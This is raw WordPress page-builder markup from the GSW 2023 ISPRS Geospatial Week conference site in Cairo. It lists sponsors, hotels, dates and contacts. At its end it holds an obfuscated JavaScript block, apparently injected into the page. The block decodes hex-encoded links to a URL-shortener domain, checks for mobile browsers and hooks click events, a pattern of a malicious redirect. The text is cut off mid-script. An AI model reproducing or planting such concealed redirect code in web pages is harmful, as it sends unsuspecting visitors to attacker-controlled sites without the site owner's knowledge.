width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 